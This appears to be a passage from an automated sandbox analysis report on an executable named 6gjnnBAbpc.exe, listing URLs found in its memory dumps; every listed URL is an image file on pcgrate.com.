                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1024px-Logo_Ball_Corporation.svg_-e1637155176306.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1200px-Zeiss_logosvg-e1626287816597.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1280px-Jet_Propulsio.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1920px-Raytheon.svg_-1-e1626285787717.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/Huawei-Logowine-1.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/IIG_logo-5.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/Newport-logo-76F09AD2F3-seeklogo.com_-e1626287837846.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/about-150x150.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/about-200x200.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/about-300x298.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/about.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/bae_systems-1.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/horiba_1.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 